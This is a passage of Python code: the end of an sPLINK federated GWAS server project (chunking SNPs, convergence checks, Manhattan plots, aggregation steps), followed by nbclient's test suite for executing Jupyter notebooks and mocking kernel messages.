t_stat_value = round_result(self.t_stat_values[snp_index][beta_counter])
p_value = round_result(self.p_values[snp_index][beta_counter])
csv_row = f'{chromosome_number},{snp_name},{base_pair_distance},' \
f'{minor_allele},{covariate},{non_missing_samples},' \
f'{beta_value},{t_stat_value},{p_value}'
result_file.write("\n" + str(csv_row))
result_file.close()
logger.info(f'Project {self.project_id}: Saving results done for chunk # {self.current_chunk}!')
except Exception as save_regression_results_exception:
logger.error(f'Project {self.project_id}: {save_regression_results_exception}')
self.project_failed()
# ############## Chunking functions
def init_chunks(self):
""" Set the total number of chunks and start/end indices of the chunks """
try:
self.total_chunks = int(np.ceil(len(self.snp_id_values) / self.chunk_size))
for split in np.array_split(np.arange(len(self.snp_id_values)), self.total_chunks):
self.start_indices_chunks.append(split[0])
self.end_indices_chunks.append(split[-1] + 1)
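# e.g., 25000 SNPs with chunk_size = 10000 give ceil(25000/10000) = 3 chunks;
# np.array_split yields near-equal chunks [0, 8334), [8334, 16667), [16667, 25000)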
logger.debug(f'Project {self.project_id}: Initializing of chunks is done!')
except Exception as init_chunk_exp:
logger.error(f'Project {self.project_id}: {init_chunk_exp}')
self.project_failed()
def setup_next_chunk(self):
""" For the next chunk of SNPs:
set the start/end chunk index, increment chunk number,
set the chunk related global parameter values, and go to non-missing-count step
"""
try:
# set the chunk attribute values
self.chunk_start_index = self.start_indices_chunks[self.current_chunk]
self.chunk_end_index = self.end_indices_chunks[self.current_chunk]
self.current_chunk += 1
self.considered_snp_indices = set(np.arange(self.chunk_start_index, self.chunk_end_index)).copy()
self.in_process_snp_indices = set(
np.arange(self.chunk_start_index, self.chunk_end_index)).copy() # used in BETA step of logistic reg
self.current_beta_iteration = 1
# set the chunk global parameter values
self.global_parameters[SplinkGlobalParameter.CURRENT_CHUNK] = self.current_chunk
self.global_parameters[SplinkGlobalParameter.TOTAL_CHUNKS] = self.total_chunks
self.global_parameters[SplinkGlobalParameter.CHUNK_START_INDEX] = self.chunk_start_index
self.global_parameters[SplinkGlobalParameter.CHUNK_END_INDEX] = self.chunk_end_index
self.global_parameters[SplinkGlobalParameter.SNP_INDEX] = self.considered_snp_indices
# tell clients to compute statistics for the new chunk starting from the non-missing-count step
self.set_step(SplinkProjectStep.NON_MISSING_COUNT)
logger.debug(f'Project {self.project_id}: Chunk # {self.current_chunk} initialized!')
except Exception as next_chunk_exp:
logger.error(f'Project {self.project_id}: {next_chunk_exp}')
self.project_failed()
# ############## Helper functions
def is_last_chunk(self):
""" Check whether current chunk is the last one """
return self.current_chunk == self.total_chunks
def has_converged(self, old_log_likelihood, new_log_likelihood):
""" Determine whether beta values has converged based on the old and new values of log likelihood """
try:
if old_log_likelihood is None:
return False
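# e.g., with the default threshold of 1e-4, old = -1234.5678 and new = -1234.56785
# give |delta| = 5e-5 <= 1e-4, so the SNP is reported as converged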
delta_log_likelihood = np.abs(old_log_likelihood - new_log_likelihood)
if delta_log_likelihood > self.delta_log_likelihood_threshold:
return False
return True
except Exception as convergence_exception:
logger.error(f'Project {self.project_id}: {convergence_exception}')
self.project_failed()
def get_start_end_indices(self, cpu_cores):
""" Determine start/end indices for sub-chunks assigned to each process/core """
try:
chunk_size = self.chunk_end_index - self.chunk_start_index
# ensure each process/core computes statistics for at least one SNP
if chunk_size < cpu_cores:
cpu_cores = 1
sub_chunk_size = int(np.ceil(chunk_size / cpu_cores))
start_indices = np.arange(self.chunk_start_index, self.chunk_end_index, sub_chunk_size)
end_indices = start_indices + sub_chunk_size
end_indices[-1] = self.chunk_end_index
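# e.g., for a chunk covering indices [0, 10000) and 8 cores: sub_chunk_size = 1250,
# start indices 0, 1250, ..., 8750 and end indices 1250, 2500, ..., 10000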
return start_indices, end_indices
except Exception as sub_chunk_exception:
logger.error(sub_chunk_exception)
self.project_failed()
return [], []
def append_to_results_all_chunks(self):
""" Add the chromosome numbers, base pair distances, and p-values of the current chunk to
the corresponding lists for all chunks """
for snp_index in np.arange(self.chunk_start_index, self.chunk_end_index):
snp_id = self.snp_id_values[snp_index].decode('utf-8')
chromosome_number, _, base_pair_distance = snp_id.split('\t')
p_value = round_result(self.p_values[snp_index])
self.chromosome_number_all_chunks.append(chromosome_number)
self.base_pair_distance_all_chunks.append(base_pair_distance)
self.p_value_all_chunks.append(p_value)
logger.debug(f'Project {self.project_id}: Chunk # {self.current_chunk} CHR/BP/P added to results for all chunks!')
def manhattan_plot(self):
""" draw Manhattan plot for p-values after processing of all chunks finished """
try:
manhattan_dict = {'CHR': self.chromosome_number_all_chunks,
'BP': self.base_pair_distance_all_chunks,
'P': self.p_value_all_chunks}
manhattan_df = pd.DataFrame.from_dict(manhattan_dict)
manhattan_df.loc[manhattan_df.P == 0.0, 'P'] = np.finfo(float).eps
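# p-values that underflow to exactly 0 are clamped to machine epsilon (~2.2e-16)
# so that -log10(p) stays finite in the plot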
manhattan_df['P_LOG10'] = -np.log10(manhattan_df.P)
manhattan_df.CHR = manhattan_df.CHR.astype('category')
manhattan_df.CHR = manhattan_df.CHR.cat.set_categories(list(set(manhattan_df.CHR)), ordered=True)
manhattan_df = manhattan_df.sort_values(['CHR', 'BP'])
manhattan_df['ind'] = range(len(manhattan_df))
manhattan_df_grouped = manhattan_df.groupby('CHR')
fig = plt.figure(figsize=(24, 8), dpi=80)
ax = fig.add_subplot(111)
colors = ['blue', 'green', 'purple', 'brown']
x_labels = []
x_labels_pos = []
for num, (name, group) in enumerate(manhattan_df_grouped):
logger.debug(f'Project {self.project_id}: plotting chromosome {name}')
group.plot(kind='scatter', x='ind', y='P_LOG10', color=colors[num % len(colors)], ax=ax)
x_labels.append(name)
x_labels_pos.append((group['ind'].iloc[-1] - (group['ind'].iloc[-1] - group['ind'].iloc[0]) / 2))
ax.set_xticks(x_labels_pos)
ax.set_xticklabels(x_labels)
ax.set_xlim([0, len(manhattan_df)])
ax.set_xlabel('Chromosome')
ax.set_ylabel('-log10(p)')
result_dir = self.create_result_dir()
plt.savefig(f'{result_dir}/manhattan-plot.png', format='png')
logger.debug(f'Project {self.project_id}: Manhattan plot created!')
except Exception as plot_exp:
logger.error("Exception in Manhattan plot!")
logger.error(plot_exp)
# ############## sPLINK specific aggregation code
def aggregate(self):
""" OVERRIDDEN: perform sPLINK-project specific aggregations """
# The following four lines MUST always be called before the aggregation starts
super().pre_aggregate()
if self.status != ProjectStatus.AGGREGATING: # if project failed or aborted, skip aggregation
super().post_aggregate()
return
logger.info(f'Project {self.project_id}: ############## aggregate ####### ')
logger.info(f'Project {self.project_id}: #### step {self.step}')
if self.step == HyFedProjectStep.INIT: # The first step name MUST always be HyFedProjectStep.INIT
self.init_step()
elif self.step == SplinkProjectStep.SNP_ID:
self.snp_id_step()
elif self.step == SplinkProjectStep.ALLELE_NAME:
self.allele_name_step()
elif self.step == SplinkProjectStep.SAMPLE_COUNT:
self.sample_count_step()
elif self.step == SplinkProjectStep.NON_MISSING_COUNT:
self.non_missing_count()
elif self.step == SplinkProjectStep.MINOR_ALLELE:
self.minor_allele_step()
elif self.step == SplinkProjectStep.CONTINGENCY_TABLE:
self.contingency_table_step()
elif self.step == SplinkProjectStep.BETA_LINEAR:
self.beta_linear_step()
elif self.step == SplinkProjectStep.BETA_LOGISTIC:
self.beta_logistic_step()
elif self.step == SplinkProjectStep.STD_ERROR_LINEAR:
self.std_error_linear_step()
elif self.step == SplinkProjectStep.STD_ERROR_LOGISTIC:
self.std_error_logistic_step()
elif self.step == HyFedProjectStep.RESULT:
super().result_step()
# The following line MUST be the last function call in the aggregate function
super().post_aggregate()
|
test_client.py
|
import asyncio
import concurrent.futures
import copy
import datetime
import functools
import os
import re
import threading
import warnings
from base64 import b64decode, b64encode
from queue import Empty
from unittest.mock import MagicMock, Mock
import nbformat
import pytest
import xmltodict
from ipython_genutils.py3compat import string_types
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert.filters import strip_ansi
from nbformat import NotebookNode
from testpath import modified_env
from traitlets import TraitError
from .. import NotebookClient, execute
from ..exceptions import CellExecutionError
from .base import NBClientTestsBase
addr_pat = re.compile(r'0x[0-9a-f]{7,9}')
ipython_input_pat = re.compile(r'<ipython-input-\d+-[0-9a-f]+>')
current_dir = os.path.dirname(__file__)
class AsyncMock(Mock):
pass
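# helper: wrap a plain value in a coroutine so that mocked kernel-client calls
# (e.g. get_msg) can be awaited like the real async API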
def make_async(mock_value):
async def _():
return mock_value
return _()
def normalize_base64(b64_text):
# if it's base64, pass it through b64 decode/encode so that
# equivalent values are not considered unequal
try:
return b64encode(b64decode(b64_text.encode('ascii'))).decode('ascii')
except (ValueError, TypeError):
return b64_text
def run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = executor.execute()
return input_nb, output_nb
def run_notebook_wrapper(args):
# since concurrent.futures.ProcessPoolExecutor doesn't have starmap,
# we need to unpack the arguments
return run_notebook(*args)
async def async_run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = await executor.async_execute()
return input_nb, output_nb
def prepare_cell_mocks(*messages, reply_msg=None):
"""
This function prepares an executor object which has a fake kernel client
to mock the messages sent over ZeroMQ. The mock kernel client will return
the messages passed into this wrapper back from ``executor.kc.iopub_channel.get_msg``
callbacks. It also appends a kernel idle message to the end of messages.
"""
parent_id = 'fake_id'
messages = list(messages)
# Always terminate messages with an idle to exit the loop
messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}})
def shell_channel_message_mock():
# Return the message generator for
# self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}}
return AsyncMock(
return_value=make_async(
NBClientTestsBase.merge_dicts(
{
'parent_header': {'msg_id': parent_id},
'content': {'status': 'ok', 'execution_count': 1},
},
reply_msg or {},
)
)
)
def iopub_messages_mock():
# Return the message generator for
# self.kc.iopub_channel.get_msg => messages[i]
return AsyncMock(
side_effect=[
# Default the parent_header so mocks don't need to include this
make_async(
NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg)
)
for msg in messages
]
)
def prepared_wrapper(func):
@functools.wraps(func)
def test_mock_wrapper(self):
"""
This inner function wrapper populates the executor object with
the fake kernel client. This client has its iopub and shell
channels mocked so as to fake the setup handshake and return
the messages passed into prepare_cell_mocks as the execute_cell loop
processes them.
"""
cell_mock = NotebookNode(
source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[]
)
executor = NotebookClient({})
executor.nb = {'cells': [cell_mock]}
# self.kc.iopub_channel.get_msg => message_mock.side_effect[i]
message_mock = iopub_messages_mock()
executor.kc = MagicMock(
iopub_channel=MagicMock(get_msg=message_mock),
shell_channel=MagicMock(get_msg=shell_channel_message_mock()),
execute=MagicMock(return_value=parent_id),
is_alive=MagicMock(return_value=make_async(True)),
)
executor.parent_id = parent_id
return func(self, executor, cell_mock, message_mock)
return test_mock_wrapper
return prepared_wrapper
def normalize_output(output):
"""
Normalizes outputs for comparison.
"""
output = dict(output)
if 'metadata' in output:
del output['metadata']
if 'text' in output:
output['text'] = re.sub(addr_pat, '<HEXADDR>', output['text'])
if 'text/plain' in output.get('data', {}):
output['data']['text/plain'] = re.sub(addr_pat, '<HEXADDR>', output['data']['text/plain'])
if 'application/vnd.jupyter.widget-view+json' in output.get('data', {}):
output['data']['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>'
if 'image/svg+xml' in output.get('data', {}):
output['data']['image/svg+xml'] = xmltodict.parse(output['data']['image/svg+xml'])
for key, value in output.get('data', {}).items():
if isinstance(value, string_types):
output['data'][key] = normalize_base64(value)
if 'traceback' in output:
tb = [
re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(line))
for line in output['traceback']
]
output['traceback'] = tb
return output
def assert_notebooks_equal(expected, actual):
expected_cells = expected['cells']
actual_cells = actual['cells']
assert len(expected_cells) == len(actual_cells)
for expected_cell, actual_cell in zip(expected_cells, actual_cells):
# Uncomment these to help debug test failures better
# from pprint import pprint
# pprint(expected_cell)
# pprint(actual_cell)
expected_outputs = expected_cell.get('outputs', [])
actual_outputs = actual_cell.get('outputs', [])
normalized_expected_outputs = list(map(normalize_output, expected_outputs))
normalized_actual_outputs = list(map(normalize_output, actual_outputs))
assert normalized_expected_outputs == normalized_actual_outputs
expected_execution_count = expected_cell.get('execution_count', None)
actual_execution_count = actual_cell.get('execution_count', None)
assert expected_execution_count == actual_execution_count
def notebook_resources():
"""
Prepare a notebook resources dictionary for executing test
notebooks in the ``files`` folder.
"""
return {'metadata': {'path': os.path.join(current_dir, 'files')}}
def filter_messages_on_error_output(err_output):
allowed_lines = [
# ipykernel might be installed without the debugpy extension
"[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
]
filtered_result = [line for line in err_output.splitlines() if line not in allowed_lines]
return os.linesep.join(filtered_result)
@pytest.mark.parametrize(
["input_name", "opts"],
[
("Other Comms.ipynb", dict(kernel_name="python")),
("Clear Output.ipynb", dict(kernel_name="python")),
("Empty Cell.ipynb", dict(kernel_name="python")),
("Factorials.ipynb", dict(kernel_name="python")),
("HelloWorld.ipynb", dict(kernel_name="python")),
("Inline Image.ipynb", dict(kernel_name="python")),
(
"Interrupt.ipynb",
dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True),
),
("JupyterWidgets.ipynb", dict(kernel_name="python")),
("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")),
("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)),
("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")),
("SVG.ipynb", dict(kernel_name="python")),
("Unicode.ipynb", dict(kernel_name="python")),
("UnicodePy3.ipynb", dict(kernel_name="python")),
("update-display-id.ipynb", dict(kernel_name="python")),
("Check History in Memory.ipynb", dict(kernel_name="python")),
],
)
def test_run_all_notebooks(input_name, opts):
"""Runs a series of test notebooks and compares them to their actual output"""
input_file = os.path.join(current_dir, 'files', input_name)
input_nb, output_nb = run_notebook(input_file, opts, notebook_resources())
assert_notebooks_equal(input_nb, output_nb)
def test_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
threads = [
threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res))
for label in ("A", "B")
]
[t.start() for t in threads]
[t.join(timeout=2) for t in threads]
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)])
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_async_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
tasks = [
async_run_notebook(input_file.format(label=label), opts, res) for label in ("A", "B")
]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_async_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
tasks = [async_run_notebook(input_file, opts, res) for i in range(4)]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_execution_timing():
"""Compare the execution timing information stored in the cell with the
actual time it took to run the cell. Also check for the cell timing string
format."""
opts = dict(kernel_name="python")
input_name = "Sleep1s.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
input_nb, output_nb = run_notebook(input_file, opts, res)
def get_time_from_str(s):
time_format = '%Y-%m-%dT%H:%M:%S.%fZ'
return datetime.datetime.strptime(s, time_format)
execution_timing = output_nb['cells'][1]['metadata']['execution']
status_busy = get_time_from_str(execution_timing['iopub.status.busy'])
execute_input = get_time_from_str(execution_timing['iopub.execute_input'])
execute_reply = get_time_from_str(execution_timing['shell.execute_reply'])
status_idle = get_time_from_str(execution_timing['iopub.status.idle'])
cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text'])
cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text'])
delta = datetime.timedelta(milliseconds=100)
assert status_busy - cell_start < delta
assert execute_input - cell_start < delta
assert execute_reply - cell_end < delta
assert status_idle - cell_end < delta
def test_synchronous_setup_kernel():
nb = nbformat.v4.new_notebook()
executor = NotebookClient(nb)
with executor.setup_kernel():
# Prove it initialized the client
assert executor.kc is not None
# Prove it removed the client (and hopefully cleaned up)
assert executor.kc is None
def test_startnewkernel_with_kernelmanager():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
executor.start_new_kernel()
kc = executor.start_new_kernel_client()
    # prove it initialized the client
assert kc is not None
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
def test_start_new_kernel_history_file_setting():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
kc = km.client()
# Should start empty
assert executor.extra_arguments == []
# Should assign memory setting for ipykernel
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# Should not add a second hist_file assignment
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
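# A minimal sketch (not part of the original test suite) contrasting the manual
# shutdown/cleanup sequence above with the setup_kernel() context manager, which
# tears the kernel client down automatically on exit. Assumes nbformat and
# NotebookClient are imported at the top of this module, as in the tests above.
def example_setup_kernel_auto_cleanup():
    nb = nbformat.v4.new_notebook()
    client = NotebookClient(nb)
    with client.setup_kernel():
        # a kernel client is available inside the block
        assert client.kc is not None
    # on exit the context manager has cleaned the client up for us
    assert client.kc is None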
class TestExecute(NBClientTestsBase):
"""Contains test functions for execute.py"""
maxDiff = None
def test_constructor(self):
NotebookClient({})
def test_populate_language_info(self):
nb = nbformat.v4.new_notebook() # Certainly has no language_info.
executor = NotebookClient(nb, kernel_name="python")
nb = executor.execute()
assert 'language_info' in nb.metadata
def test_empty_path(self):
"""Can the kernel be started when the path is empty?"""
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
res = self.build_resources()
res['metadata']['path'] = ''
input_nb, output_nb = run_notebook(filename, {}, res)
assert_notebooks_equal(input_nb, output_nb)
@pytest.mark.xfail(
"python3" not in KernelSpecManager().find_kernel_specs(),
reason="requires a python3 kernelspec",
)
def test_empty_kernel_name(self):
"""Can kernel in nb metadata be found when an empty string is passed?
Note: this pattern should be discouraged in practice.
Passing in no kernel_name to NotebookClient is recommended instead.
"""
filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb')
res = self.build_resources()
input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res)
assert_notebooks_equal(input_nb, output_nb)
with pytest.raises(TraitError):
input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res)
def test_disable_stdin(self):
"""Test disabling standard input"""
filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res)
# We need to special-case this particular notebook, because the
# traceback contains machine-specific stuff like where IPython
# is installed. It is sufficient here to just check that an error
# was thrown, and that it was a StdinNotImplementedError
self.assertEqual(len(output_nb['cells']), 1)
self.assertEqual(len(output_nb['cells'][0]['outputs']), 1)
output = output_nb['cells'][0]['outputs'][0]
self.assertEqual(output['output_type'], 'error')
self.assertEqual(output['ename'], 'StdinNotImplementedError')
self.assertEqual(
output['evalue'],
'raw_input was called, but this frontend does not support input requests.',
)
def test_timeout(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(TimeoutError) as err:
run_notebook(filename, dict(timeout=1), res)
self.assertEqual(
str(err.value.args[0]),
"""A cell timed out while it was being executed, after 1 seconds.
The message was: Cell execution timed out.
Here is a preview of the cell contents:
-------------------
while True: continue
-------------------
""",
)
def test_timeout_func(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
def timeout_func(source):
return 10
with pytest.raises(TimeoutError):
run_notebook(filename, dict(timeout_func=timeout_func), res)
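    # A minimal sketch (assumption, not part of the original tests): a timeout_func
    # that scales the per-cell timeout with the size of the cell instead of returning
    # a constant as above. Whether the callable receives the cell node or only its
    # source may depend on the nbclient version, so both are handled defensively.
    @staticmethod
    def example_timeout_func(cell_or_source):
        text = getattr(cell_or_source, 'source', cell_or_source) or ''
        # hypothetical heuristic: 5 seconds plus one extra second per 10 lines
        return 5 + len(text.splitlines()) // 10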
def test_kernel_death_after_timeout(self):
"""Check that an error is raised when the kernel is_alive is false after a cell timed out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
executor = NotebookClient(input_nb, timeout=1)
with pytest.raises(TimeoutError):
executor.execute()
km = executor.create_kernel_manager()
async def is_alive():
return False
km.is_alive = is_alive
# Will be a RuntimeError or subclass DeadKernelError depending
# on if jupyter_client or nbconvert catches the dead client first
with pytest.raises(RuntimeError):
input_nb, output_nb = executor.execute()
def test_kernel_death_during_execution(self):
"""Check that an error is raised when the kernel is_alive is false during a cell
execution.
"""
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(input_nb)
with pytest.raises(RuntimeError):
executor.execute()
def test_allow_errors(self):
"""
Check that conversion halts if ``allow_errors`` is False.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(allow_errors=False), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_force_raise_errors(self):
"""
Check that conversion halts if the ``force_raise_errors`` traitlet on
NotebookClient is set to True.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(force_raise_errors=True), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_reset_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, a new one must have been created
kc = executor.kc
assert kc is not None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, the previously created one must have been reused
assert kc == executor.kc
executor.execute(reset_kc=True, cleanup_kc=False)
# we asked to reset the kernel client, the previous one must have been cleaned up,
# a new one must have been created
assert kc != executor.kc
def test_cleanup_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute()
# we asked to cleanup the kernel client (default is True)
assert executor.kc is None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client
# a new one must have been created and should still be available
assert executor.kc is not None
def test_custom_kernel_manager(self):
from .fake_kernelmanager import FakeCustomKernelManager
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
executor = NotebookClient(
cleaned_input_nb,
resources=self.build_resources(),
kernel_manager_class=FakeCustomKernelManager,
)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
executor.execute()
expected = FakeCustomKernelManager.expected_methods.items()
for method, call_count in expected:
            self.assertNotEqual(call_count, 0, f'{method} was not called')
def test_process_message_wrapper(self):
outputs = []
class WrappedPreProc(NotebookClient):
def process_message(self, msg, cell, cell_index):
result = super().process_message(msg, cell, cell_index)
if result:
outputs.append(result)
return result
current_dir = os.path.dirname(__file__)
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
wpp = WrappedPreProc(input_nb)
executed = wpp.execute()
assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}]
assert_notebooks_equal(original, executed)
def test_execute_function(self):
# Test the execute() convenience API
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
executed = execute(original, os.path.dirname(filename))
assert_notebooks_equal(original, executed)
def test_widgets(self):
"""Runs a test notebook with widgets and checks the widget state is saved."""
input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb')
opts = dict(kernel_name="python")
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(input_file)
input_nb, output_nb = run_notebook(input_file, opts, res)
output_data = [
output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs']
]
model_ids = [
data['application/vnd.jupyter.widget-view+json']['model_id']
for data in output_data
if 'application/vnd.jupyter.widget-view+json' in data
]
wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json']
for k in model_ids:
d = wdata['state'][k]
assert 'model_name' in d
assert 'model_module' in d
assert 'state' in d
assert 'version_major' in wdata
assert 'version_minor' in wdata
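# A minimal sketch (not part of the original test suite; the helper name is
# hypothetical) of how the widget state asserted in test_widgets above could be
# listed from an executed notebook node. Only dictionary lookups on the same keys
# the test checks are used.
def example_list_widget_models(executed_nb):
    widgets_meta = executed_nb['metadata'].get('widgets', {})
    state = widgets_meta.get('application/vnd.jupyter.widget-state+json', {}).get('state', {})
    # each entry maps a model_id to its model_name/model_module/state payload
    return [(model_id, entry.get('model_name')) for model_id, entry in state.items()]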
class TestRunCell(NBClientTestsBase):
"""Contains test functions for NotebookClient.execute_cell"""
@prepare_cell_mocks()
def test_idle_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Just the exit message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'parent_header': {'msg_id': 'wrong_parent'},
'content': {'name': 'stdout', 'text': 'foo'},
}
)
def test_message_for_wrong_parent(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An ignored stream followed by an idle
assert message_mock.call_count == 2
# Ensure no output was written
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'status',
'header': {'msg_type': 'status'},
'content': {'execution_state': 'busy'},
}
)
def test_busy_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One busy message, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
